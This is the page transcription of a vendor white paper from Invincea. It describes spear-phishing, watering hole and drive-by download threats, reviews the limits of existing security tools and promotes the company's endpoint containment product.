Spear-Phishing, Watering Hole and Drive-By Attacks: The New Normal
←
→
Page content transcription
If your browser does not render page correctly, please read the page content below
Spear-Phishing, Watering Hole and Drive-By Attacks: The New Normal Secure the primary vulnerability exploited by your adversaries – protect every employee DETECTION | PREVENTION | INTELLIGENCE 3975 University Drive, Suite 460, Fairfax, Virginia 22030 | 1-855-511-5967 | Invincea.com | @invincea
Executive Summary The news over the past 18 to 24 months proves one alarming fact - the single largest threat your organization faces today is network breach. Your employees have become the primary target of a diverse set of motivated adversaries bent on one objective: penetrating your network in order to gain access to sensitive information including financial data, research and development activities, intellectual property, and personally identifiable information on your clients and employees. Today’s most successful and common attack vectors involve tricking your users into opening the door to your network. Spear- phishing, watering hole attacks and drive-by downloads are the new normal. The adversary is gaining entry into your network by enticing your employees to click on links and open document attachments and every time they go to the Internet or open the email client, they put your company at risk. The techniques used by your adversaries include: Spear-phishing emails that deliver the employee to malicious websites that run drive-by download exploits or include weaponized document attachments Watering hole attacks that involve hijacking legitimate, trusted sites to push malware to unsuspecting users Poisoning search results behind trending news items on popular engines, such as Google, Yahoo!, and Bing Pushing malware through popular social networks such as Twitter and Facebook Your organization is under a state of constant and sustained attack, and every employee represents a potential point of weakness in your security strategy. Innovation in endpoint security is a critical need. New approaches to insulate the employee against these attacks are required and Invincea is the solution. Diverse Adversaries – Common Objectives – Massive Gains Your adversaries range from nation states seeking to steal government secrets and intellectual property, to organized cyber criminals seeking to perpetrate financial fraud and identity theft, to hacktivists seeking to disclose your secrets in the public eye in an effort to shame your organization. Regardless of the actors, the common denominator is that your employees are the entry point. For nation states and cyber criminals the motivation is clear: massive financial gain on the back of your long-term investments. “Cyber-crime’s estimated cost is more than that of cocaine, heroin, and marijuana trafficking put together.” Khoo Boon Hui – President, Interpol Page 2
No One is Immune The question from business leaders to their security teams was once “Can this happen to us?” The news over the past 18-24 months has answered that question with an emphatic “Yes…no one is immune.” Every organization is at risk for cyber breach. Depending on the size of the organization, the industry, and the geographic footprint, the adversarial focus may vary. Small and medium sized businesses are most at risk from organized cyber criminals. Enterprises and governments face threats from all three of the main adversarial categories – nation states, cyber-crime, and hacktivists. The Hackmageddon blog covers the motives of adversaries, their targets, and includes a detailed graphic timeline of hacking incidents categorized by month in 2012. Below are a few real-world examples of recent attacks against a wide cross section of industries. The sad reality is that this list is not all-inclusive as there are simply too many examples to cite. Spear-phishing attack against RSA Spear-phishing attack against Oak Ridge National Labs Spear-phishing attacks against global energy companies “Night Dragon” Spear-phishing attacks against dozens of industries “Operation Shady RAT” Spear-phishing attacks against The Wall Street Journal, Washington Post and New York Times Watering hole attacks against Facebook, Twitter and Apple Watering hole attack against the U.S. Department of Labor and Energy Drive-by download attack using popular site Speedtest.net Drive-by download attack using major Washington D.C. area radio station websites Hacktivist attack against Sony PlayStation Network Spear-phishing attacks against private firms, think tanks, government organizations Spear-phishing attacks against gas pipeline firms Cyber-crime attacks against small and medium sized businesses Assessing the Cost of Data Breach The Ponemon Institute’s “2012 Cost of Cyber Crime” report places the cost of data breach at an average of roughly $8.4 million. A hefty sum to be sure; however, recent disclosures are even more alarming. When considering the risk of a breach, look at the following: $66 million in losses at RSA – The Security Division of EMC $171 million in losses suffered at Sony for breach of Sony PlayStation Network Page 3
According to an anonymous source in the U.S. Intelligence community quoted in this Washington Post report, attacks by nation states in the past two years have resulted in: o Loss of $100 million worth of insecticide research o Loss of $400 million worth of chemical formulas o Loss of $600 million worth of proprietary electronics data “Trade secrets developed over thousands of working hours…are stolen in a split second.” Robert “Bear” Bryan – National Counterintelligence Executive The User as the Unwitting Accomplice We live in a constantly connected world, and every employee in your organization has multiple ways to access your network. They have free reign over the Internet to aide in productivity and are always connected to the email client, day or night, at work or home. Your adversaries know this and use it to their advantage. They also know that despite all of the effort you expend attempting to train your users to make good security decisions; a well-crafted attack has a high likelihood of success. Every employee in the organization is a potential unwitting accomplice to breach, from the intern to the chief executive. Why? The adversaries also know that internal network security is virtually non-existent. With access to, and residency on, a single machine, they can move laterally to seek out the keys to your kingdom. Looking at the 2011 Investigations report released by the U.S. Computer Emergency Response Team (US-CERT), it is clear that the employee is the primary target. When combining phishing and malicious website-based attacks (i.e. attacks involving employees), US-CERT found that roughly 58% of incidents in 2011 involved direct attacks against the employee. Total Incidents Reported to US-CERT FY 2011 Phishing 55,153 51.20% Virus/Trojan/Worm/Logic Bomb 8,236 7.70% Malicious Website 6,795 6.30% Non Cyber 9,652 9% Policy Violation 7,927 7.40% Equipment Theft/Loss 6,635 6.20% Suspicious Network Activity 3,527 3.30% Page 4
Attempted Access 863 0.80% Social Engineering 2,573 2.40% Others 6,294 5.80% Total 107,655 100% (Source: US-CERT FY’2011 Investigations) Fighting an Uphill Battle When it comes to defending against today’s adversaries, the burden typically falls on under armed, overworked IT and Information Security teams. Shrinking budgets; limited human resources; wide swathing workloads; lack of innovative new solutions from trusted vendors; and constant push back from the business to minimize any changes to employee workflow are all working against these teams in their fight to protect your organization. When we combine these challenges with the fact that your adversaries are well-funded, staffed, motivated, and constantly evolving their techniques, it is little wonder that we see the pace of breaches increasing at an exponential rate. Your IT and Information Security teams need help. They need new solutions that can meet the demand of the business to keep the employee productive and at the same time protect every employee from becoming an unwitting accomplice to breach. Unfortunately, the adversary has you outnumbered. This isn’t a problem that can be addressed by scaling your internal team. In fact, every one of your employees is a potential target. This is a problem that demands a technology solution to aid the internal security team in identifying the adversary while not ceding the network to breach. Wash-Rinse-Repeat - The Security Insanity Cycle: Against the backdrop described above, these teams often find themselves in a game of “Whac-A-Mole” with your adversaries. The wash-rinse-repeat cycle of infection detection, remediation, and patching used to penetrate your network is what Invincea calls the “Security Insanity Cycle.” Page 5
The fundamental problems with this reality are threefold: 1. Infections are usually detected months or years after the fact, meaning the damage is long since done and the adversary has had ample time to both colonize the network and steal sensitive data. “In over half of the incidents investigated, it took months – sometimes even years – for this realization to dawn.” Verizon Business Data Breach Investigations Report - 2012 2. Dollars spent on remediation reach into the millions, meaning unbudgeted costs for the organization that impact the bottom line and add to the overall cost of network breach. Moreover, these millions are spent after the damage is done – they do nothing to protect your organization. 3. While your teams are fighting the newly discovered fire, the adversary continues to attack other parts of the organization. This is where the “Whac-A-Mole” analogy comes into play. Your adversaries are persistent – while you clean up one attack, they’ve already pivoted and are launching others against you. Page 6
The Great Malware Arms Race One significant reason that your teams are at a severe disadvantage to your adversaries is that many of the technologies they rely upon are reactive. Most require a list of known bad malware or websites in order to detect or block malware. These technologies no longer work against today’s adversaries who continuously morph their signature while standing up and bringing down websites on an hourly basis. Consider the following when looking at the ability of signature-based defenses to protect your organization: Malware authors are producing roughly 80,000 new variants per day (McAfee). Malware authors are increasingly utilizing polymorphic techniques in which malware mutates itself to evade signatures. The endpoint has effectively become the new perimeter and Anti-Virus (AV) is the primary endpoint security solution, yet an alarming (though somewhat dated) Cyveillance study shows that AV vendors detect less than 19% of attacks on average. Why Current Defenses Fall Short What we need to understand when looking at our defensive strategies is that for all intents and purposes, the user has become the new perimeter. As we have moved to an always-on, increasingly mobile lifestyle, we have changed the security paradigm. It has evolved from one of protecting assets that are statically placed behind our layered defenses to one of protecting those assets wherever they may be at any given point in time. If we accept the ample evidence that suggests the employee is the primary target, then we must also protect his or her computing device. To further support this assertion, consider two recent examples of adversaries targeting employees on the road: Popular IBAHN wireless hotel network attack (December 2011) IC3 warning of attacks through hotel wireless networks (May 2012) Page 7
Assessing the Power of Anti-Virus Anti-virus (AV) software is inherently reactive because it discovers infections after they occur and is unable to detect new malicious code variants. Typically only a handful of the 40+ AV products will know about the malware. Again, this is because more than 80,000 new malware variants are being released into the wild on a daily basis and malware writers are now using polymorphic techniques to constantly avoid detection. Some AV offerings now feature heuristic patterning in which threats are grouped and analyzed according to common characteristics. However, heuristics are rarely deployed by the AV companies because they are subject to false-positives, which can result in severe damage to the system if a system file is quarantined as a false positive. Some AV vendors augment resident data repositories with a real-time, cloud-based service in order to reduce the time it takes to identify threats and provide updates to customers. However, the fundamental approach remains unchanged. These tools are still only stopping known threats, so they’re missing the most sophisticated elements of the threat landscape. Assessing the Power of Firewalls One traditional way of protecting the enterprise is to build a wall around the castle – a network firewall. However, firewalls are designed to stop inbound threats to services that should not be offered outside the organization. In the context of a Web browser or email client, firewalls are ineffective since they block only inbound attacks, and browser malware is initiated by outbound Web page requests that pass through the firewall. Additionally, email attachment based attacks often penetrate firewalls to reach employees if the malware is unknown to AV scanners running at firewalls. The bad actor doesn’t need to try to penetrate the network since the user pulls it in from the inside. Firewalls obviously maintain a role in a layered defense approach as they help to prevent inbound attacks against ports and services that should not be exposed to the outside. Also, if an attack occurs at the network layer, firewalls and filtering proxies can block the connection and prevent the attack from compromising other machines within the enterprise. It just isn’t enough against today’s threats, especially if we accept the assertion that the endpoint is the new perimeter. Assessing the Power of Web Gateways Web gateway solutions like Bluecoat, Websense, and those offered by some of the major AV vendors selectively block Web content from a known malicious source. Their effectiveness revolves around the ability to proactively blacklist untrusted sites or, more restrictively, only allow users to visit certain whitelisted sites so that when a user clicks a link, the gateway may prevent the browser from accessing the site. Similar to AV solutions, Web gateways need to know what bad is beforehand in order to stop your employees from accessing it. Gateways definitely deliver a broader solution than AV because they can blacklist IP addresses and URLs, but they still play a game of cat and mouse with the adversary. It just isn’t enough against today’s threats. Page 8
Consider the complexity of maintaining an accurate whitelist and blacklist for your Web gateway when taking into account some of this recent news: 30,000 new malicious sites stood up on a daily basis “Lizamoon” attack infects millions of legitimate websites Amnesty International website hijacked to push malware High-ranked sites hijacked and blacklisted by Google Assessing the Power of Application Whitelisting While application whitelisting is effective at preventing standalone malware executables from running, most attacks exploit known trusted applications including the browser, document readers, and document editors. Microsoft Internet Explorer, Adobe Reader and, increasingly, Microsoft Office documents are the most vulnerable, targeted, and widely used applications on the desktop. These applications present a rich environment for attackers to find and exploit vulnerabilities. They also provide fertile ground for adversaries to dupe users into clicking on links and opening documents. As malware exploits those applications, the cyber adversary gains a foothold in the enterprise via the whitelisted application. The malware has access to that machine, the data on that machine, and all network devices to which that machine is connected. A paper recently presented at SchmooCon 2012 entitled “Raising the White Flag” detailed the security gaps in leading whitelisting tools including: ActiveX controls PDF documents Office documents Shellcode injection Java Javascript Browser exploits Browser extensions Scripting Page 9
Not surprisingly, these attacks involve exploiting both the extant vulnerabilities and the extensions and plug-ins of whitelisted applications including the browser and document readers and editors. This includes scripting languages, shellcode, Java, interpreters, and vulnerabilities in the applications themselves. Unfortunately, these are the most common real-world exploits. Most exploits work by either using a spear-phish to direct the user to click on a link or directing the user to open an attachment. Users also get infected using more opportunistic methods like poisoned search engine results or simply browsing the Web. It’s not unusual for malware to leverage a browser vulnerability to directly inject itself into the memory of a running process, such as an operating system service. In all of these cases, the exploited or infected process has been whitelisted and therefore is allowed to run with full and normal privileges. Assessing the Power of Network-Based Malware Detection Recently there has been a push for perimeter security solutions that promise to do behavioral analysis of content using virtual machines. However, there are fundamental limitations with this approach based on content analysis and scalability and they have already been circumvented by several countermeasures, some of which are quite simple. Network Boundary Limitations for In-Line Analysis: The fundamental limitation on deployments in practice is making the network appliance the bottleneck for all inbound content. While deep packet inspection (DPI) technologies have made progress to being able to do in-line inspection at gigabit speeds, DPI devices are doing pattern matching on hardware optimized for the purpose of matching network streams against known attack patterns, i.e., signature matching against known threats. Network appliances that attempt to run content in a virtual machine (VM) at the network boundary before passing on the content face a fundamental limitation on introducing unacceptable latency for each session or content type that must be analyzed prior to passing the content to the user. To do in-line monitoring with a VM-based technique, you will need to create a VM for each session nominally, and likely for each content type. For instance, if a user browses to a website and the device attempts to determine if that website is malicious, it will also need to browse to the website and attempt to observe any malicious behavior. Clearly the latency to perform this action pro-actively is infeasible, so best case is it determines the site is malicious while the breach happens or after the breach occurs. For example, in analyzing the content attached to an email, a VM must be created for each content type. If the email has a PowerPoint, Word, and .zip archive with executable type programs embedded, then a VM must be created for each of these content types – and that is just for a single email for a single user. There are significant scalability issues that arise with this approach: 1. Scaling to number of users 2. Scaling to number of sessions and emails per user Page 10
3. Scaling to content types 4. Scaling to versions of software for each content type (e.g., Adobe 8.x, Adobe 9.x) to determine if a vulnerability is being exploited 5. Scaling within acceptable latency bounds for delaying delivery of content Points 1, 2, and 3 above set the requirement for a certain number of VMs to be created per user in your organization based on the network sessions they have and content type. Point 4 exacerbates this problem severely because most exploits are both specific to a particular version of the application running the content type and the operating system that runs the application. In other words, an in-line solution will need to include every version of every application/operating system combination present within the network to determine if it may be exploited by the untrusted content. The final point, Point 5, is extremely difficult to overcome because it cannot scale with hardware. The adversary can introduce arbitrary delays in running malicious code. For instance, when opening a Word or PDF document, the malicious code may choose to wait 15 or 20 minutes before running. Some exploits we have observed in practice will require a system reboot before running the malicious code. Finally, archiving content in a compressed, encrypted, or password-protected format where the password or key is shared with the user defeats in-line approaches, simply because the content cannot be scanned at the gateway. These tactics are all within control of the adversary and make in-line analysis of content fundamentally unscalable. In addition to all these drawbacks, hardware isn’t cheap. With a robustly configured server, you can host at least 64 and at best 128 virtual machines. Once you start to do the math on how many simultaneous virtual machines need to be created for your users, how many sessions will take place, and which content types will be used, this approach gets unscalable and uneconomical quite rapidly. As a result, the market quickly concluded that running this class of solution that inspects inbound content via virtualization at the network perimeter is infeasible. Because in-line analysis has become untenable, these devices are now being configured to examine outbound connections only. What this means in practice is the device can look at outbound connections (primarily http) to attempt to determine if an internal machine is communicating with a known command and control network. In this case, the device has simply become another pattern matching machine that is driven by the latest lists of known botnet command and control networks. Likewise, abandoning the virtualization approach for behavioral analysis is often used to simply compare signatures of content such as executable type files against known malicious signatures. Unfortunately this means the device has become another in a long list of security appliances that are reactive and can only detect known threats. If the detection efforts fail, then the effort becomes about the post facto discovery of the malware that takes root within the IT infrastructure. Network colonization by the adversary and the required network remediation to address the problem can be very expensive, typically costing seven figures to rid the network of an infection. Page 11
A final point to consider with network boundary devices is the case of the mobile user outside of the network. When this user is simply online on the road or at home, not VPN’d into the corporate network, they are essentially bypassing any protection provided by network perimeter devices. With the expansion of the mobile work force and personal email services, this is becoming a significant risk for enterprise security managers. The Invincea Solution Invincea addresses the gaps left by other security solutions by protecting the most important attack surface in the enterprise – the employee. Invincea employs application virtualization to create a protective “bubble” around applications that run untrusted content – including Web browsers, PDF readers, the Office suite, .zip and .exes files. We protect users against both known and zero-day malware delivered via spear-phishing, watering holes, drive-by downloads, social networking worms, fake anti-virus and other online threats. By creating secure virtual containers and running each of these applications in its own virtual environment on the endpoint, Invincea has created an enterprise “airlock” that seals the potential attack vector off from infecting the endpoint and prohibiting lateral movement in your network. Endpoint Security Software: Invincea deploys as a lightweight Windows application. This application is licensed on a subscription basis with flexible renewal options to meet your specific needs. The application has the ability to protect your users against all untrusted content by moving browsers, PDF readers, Office suite, .zip files and executables into a contained, virtual environment. You simply tell us which applications you want protected and we turn on the virtual environment to support. The endpoint solution deploys quickly and easily, just as you would push any Windows-based application. Threat Intelligence Appliance: To gather the rich pre-breach forensic intelligence your teams need related to thwarted attacks, the Invincea platform also includes our Threat Data Server, which is licensed and available on-premise as a physical or virtual appliance or as a cloud-based service. The Threat Data Server is built with scalability in mind, which means you won’t have to rack and stack large amounts of new gear. Page 12
How it Works Containment Invincea takes the most highly targeted applications in your network (the Web browser, PDF reader, Office suite, .zip files, executables) and seamlessly runs them in secure virtual containers. Every time the Web browser is opened, or anytime an attachment comes from outside the network, Invincea creates a segregated environment for these applications to operate. By creating this specialized virtual environment, Invincea contains all malware – whether zero-day or known – and prevents it from attacking the host operating system as a pathway for breach and lateral movement in your network. Detection Unlike other solutions, Invincea does not rely on malware signatures for detection. Instead, it automatically identifies malware attacks based on behaviors and actions inside the contained, controlled, and isolated environment. As a result, Invincea can detect zero-day attacks in real-time and thwart those attacks with ease. Page 13
Prevention Over the past few years, we’ve been taught by repeated assertion from those that benefit from remediation and network forensic professional services that the breach cannot be stopped and that post facto detection is the new prevention. We can’t blame our fellow security professionals for their cynicism because the truth is that the prevention security industry has utterly failed us, our governments, corporations, and citizens. Reactive list-based approaches can no longer stop the threat; therefore the logical conclusion drawn and promulgated is that you can only attempt to detect the intruder in your network. Perhaps this conclusion was accurate at that point in time, but with the innovations delivered by Invincea’s breach prevention platform this is no longer a reality. When we detect an infection inside our contained environment, we immediately alert the user, discard the tainted environment, and rebuild to a gold-clean state inside 20 seconds. We also capture rich forensic detail related to the attack and feed it on to your broader security infrastructure. Intelligence – The Invincea Threat Data Server Not only do we detect and prevent breaches from occurring, we capture rich forensic intelligence on every attempted attack at the point of detection and feed this to other leading security technologies. The primary value Invincea delivers is that we actually stop the attack at the point of detection. We take every one of your users and put them in an environment that protects them from spear-phishing, drive- by downloads, poisoned search engine results, malicious websites, sites that have been hijacked, etc. We take it one step further than even that: we turn your users into part of an enterprise-wide malware detection network. The instant that malicious activity is detected in the Invincea breach prevention platform, we begin collecting forensic information. Page 14
We isolate and identify: Infection Source: We identify the URL, PDF attachment, Office attachment, .zip, or .exe file that triggered the infection Timeline of Attack: We dissect the actions of the malware – what it did when it opened, unpacked, how it cleaned up after itself, etc. Registry Changes: We capture all changes the malware attempted to make to the registry Connections: We identify any and all connections – whether inbound or outbound showing you the command and control channels the adversary attempted to create This information is fed to the Invincea Threat Data Server where it is integrated with your Security Information and Event Management (SIEM) and presented for your teams in a single interface. Understanding that you need a method to push this information on to the rest of your infrastructure, we have integrated with a number of other leading security technologies such as: McAfee ePO ArcSight Splunk Q1 Radar NetWitness ThreatGrid The threat information, including command and control server IPs and domain names, combined with indicators of compromise including file names, hashes, and registry values are matched against Invincea partners’ threat intelligence feed to provide adversarial attribution and cross-vendor intelligence on adversarial motives. The Benefit of Invincea Invincea protects the new perimeter – the endpoint – with an innovative solution that requires no signatures and keeps malware in an airlock Invincea addresses zero-days and APTs and stops them dead in their tracks Breaks the “Security Insanity Cycle” – eliminating costly detection, remediation, and patching cycles Every employee in the organization is protected wherever they go A single user virtual infection protects the entire enterprise by feeding rich forensic data to the rest of your security infrastructure to block requests from all users to URLs that infected the user that clicked on the link Invincea’s threat data feeds extend the power and life of your current investments Every enterprise license agreement includes licenses for home use, meaning your employees are protected both at work and at home Page 15
Put Invincea to Work To find out more about how to deploy Invincea and feel the safety our solutions provide, contact us today at 1-855-511-5967. Learn More Visit our website at www.invincea.com for product summaries, video demonstrations, Invincea news stories, and much more. While you are there, check out the Invincea Blog for breakdowns of trending security news articles and why they are important to you and your organization at https://www.invincea.com/newsroom/blog/. Where to Find Us For information security news and updates follow us on Twitter @Invincea. To catch a glimpse of life at Invincea, “like” our Invincea, Inc Facebook page. Or, check out what we are talking about on our Invincea YouTube channel. You can also find us here: Invincea, Inc. 3975 University Drive, Suite 460 Fairfax, VA 22030 Page 16
You can also read